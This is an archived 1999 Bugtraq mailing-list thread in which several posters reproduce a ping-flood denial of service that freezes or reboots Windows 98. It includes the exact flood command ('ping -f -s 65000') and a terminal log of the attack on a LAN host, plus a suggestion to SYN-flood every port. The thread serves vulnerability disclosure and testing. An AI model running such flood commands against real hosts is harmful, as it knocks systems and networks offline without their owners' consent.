home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / windows98_pingflood.txt < prev    next >
Encoding:
Internet Message Format  |  1999-03-24  |  5.9 KB
  1. Date: Wed, 17 Feb 1999 03:17:26 -0300
  2. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
  3. To: BUGTRAQ@netspace.org
  4. Subject: Pingflood attack against Windows98
  5.  
  6. rewt wrote:
  7. >
  8. > Try pinging the windows box with large amounts of icmp...I left 5
  9. > screened pings, each set to 65000 size...Windows will freeze shortly
  10. > after its loaded. You might also try to ping with -f.
  11. >
  12.  
  13. Hey...
  14.         I made what you suggested, and it's true... But in my case the
  15. results were a little worse than yours...
  16.         Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
  17. to make several screen boxes... With only one ping -f 65000 the system
  18. rebooted.
  19.  
  20. Best Regards
  21. -------------------------------
  22. Fabio Bastiglia Oliva - Director
  23. fboliva@safenetworks.com
  24.  
  25. Safe Networks Informatica LTDA.
  26. http://www.safenetworks.com
  27.  
  28. ----------------------------------------------------------------------
  29.  
  30. Date: Thu, 18 Feb 1999 13:32:00 -0500
  31. From: Mark A. Heilpern <heilpern@MINDSPRING.COM>
  32. To: BUGTRAQ@netspace.org
  33. Subject: Re: Pingflood attack against Windows98
  34.  
  35. At 03:17 AM 2/17/99 -0300, you wrote:
  36. >rewt wrote:
  37. >>
  38. >> Try pinging the windows box with large amounts of icmp...I left 5
  39. >> screened pings, each set to 65000 size...Windows will freeze shortly
  40. >> after its loaded. You might also try to ping with -f.
  41. >>
  42. >
  43. >Hey...
  44. >       I made what you suggested, and it's true... But in my case the
  45. >results were a little worse than yours...
  46. >       Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
  47. >to make several screen boxes... With only one ping -f 65000 the system
  48. >rebooted.
  49.  
  50. I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
  51. locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
  52. have had more returns than timing allowed to be displayed before I locked
  53. up.
  54.  
  55. ----------------------------------------------------------------------
  56.  
  57. Date: Thu, 18 Feb 1999 21:44:24 -0300
  58. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
  59. To: BUGTRAQ@netspace.org
  60. Subject: Re: Pingflood attack against Windows98
  61.  
  62. Hello all,
  63.  
  64.         As I said before, forgive me, because my english is not so good!
  65.         I'll make a "Multi-reply" in this email... It's easier ;)
  66.         Thanks for all the replies!
  67.  
  68. ------------------------------------------------------------------------
  69. ------------------------------------------------------------------------
  70. James <pyro@pyro.za.net> wrote:
  71. >
  72. > This on a LAN or Internet or both?
  73. >
  74. >         I made this test in my LAN.
  75.  
  76. -LAN Speed: 10Mbits.
  77. -NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
  78. -Hubs: 3Com Super Stack II.
  79. -Windows98 Versions: 4.10.1998 (Portuguese and English versions)
  80.  
  81. ------------------------------------------------------------------------
  82. ------------------------------------------------------------------------
  83. Laurent LEVIER <llevier@argosnet.com> wrote:
  84. >
  85. > I tried with the French version of Windows 98.
  86. >
  87. > when I run ping -l 65000 -f IPaddr.
  88. >
  89. > ping refuses. Of course ping -f 65000 is not accepted too.
  90. >
  91. > Strange the ping command changes between US & FR version.
  92. >
  93.  
  94.         Sorry, I made a mistake when sent the email to Bugtraq. The
  95. correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is:
  96.  
  97.                 ping -f -s 65000 IPaddr
  98.  
  99. ------------------------------------------------------------------------
  100. ------------------------------------------------------------------------
  101. Quantum <fusion77@bellsouth.net> wrote:
  102. >
  103. > I just tried it & had no success at my Win98 dos prompt,
  104. >
  105.  
  106.         Try from a linux... I got these results flooding from a
  107. Linux Slackware 3.6 Kernel 2.0.36...
  108.  
  109. ------------------------------------------------------------------------
  110. ------------------------------------------------------------------------
  111. Tom Van Riper <tomv@dreamscape.com>
  112. >
  113. > yeah no kidding, the world has known a dialup connection weither it be
  114. > windows or a unix type operating system, that a small amount of icmp
  115. > packets will kill the connection for years, thats old stuff.
  116. > try synfluding on ports 0-65535 for some real fun ;)
  117.  
  118.         Hehe... But a synflood just made the LAN Communication slower,
  119. and didn't affected Windows 98 than pingflood affected!
  120.  
  121. Tom Van Riper
  122. Dreamscape Online
  123.  
  124. ------------------------------------------------------------------------
  125.  
  126. Best Regards
  127. -------------------------------
  128. Fabio Bastiglia Oliva - Diretor
  129. fboliva@safenetworks.com
  130.  
  131. Safe Networks Informatica LTDA.
  132. http://www.safenetworks.com
  133.  
  134. ----------------------------------------------------------------------
  135.  
  136. Date: Fri, 19 Feb 1999 01:16:44 -0300
  137. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
  138. To: BUGTRAQ@netspace.org
  139. Subject: Pingflood attack against Windows98 - The Test
  140.  
  141. Hello all,
  142.  
  143.          This is what is happening when I ping flood a Windows98 from a
  144. Linux Slackware 3.6 (Kernel 2.0.36).
  145.  
  146.  
  147. -Before the attack-
  148.  
  149. linux:~# ping 192.168.1.4
  150. PING 192.168.1.4 (192.168.1.4): 56 data bytes
  151. 64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
  152. 64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms
  153.  
  154. --- 192.168.1.4 ping statistics ---
  155. 2 packets transmitted, 2 packets received, 0% packet loss
  156. round-trip min/avg/max = 0.5/0.5/0.5 ms
  157.  
  158.  
  159. -The Attack-
  160.  
  161. linux:~# ping -f -s 65000 192.168.1.4
  162. PING 192.168.1.3 (192.168.1.4): 65000 data bytes
  163. .......................................................................
  164. ...................................................../*After lots of
  165. little dots... Windows98 Rebooted*/...<CTRL+C>
  166.  
  167. --- 192.168.1.4 ping statistics ---
  168. 11440 packets transmitted, 228 packets received, 98% packet loss
  169. round-trip min/avg/max = 0.6/32.0/64.2 ms
  170.  
  171.  
  172. -After the attack-
  173.  
  174. linux:~# ping 192.168.1.4
  175. PING 192.168.1.4 (192.168.1.4): 56 data bytes
  176.  
  177. --- 192.168.1.4 ping statistics ---
  178. 4 packets transmitted, 0 packets received, 100% packet loss
  179.  
  180. ---
  181.  
  182.         It's what's happening here... Anyone of you got the same
  183. results?
  184.  
  185. Best Regards
  186. --------------------------------
  187. Fabio Bastiglia Oliva - Director
  188. fboliva@safenetworks.com
  189.  
  190. Safe Networks Informatica LTDA.
  191. http://www.safenetworks.com
  192.  
  193.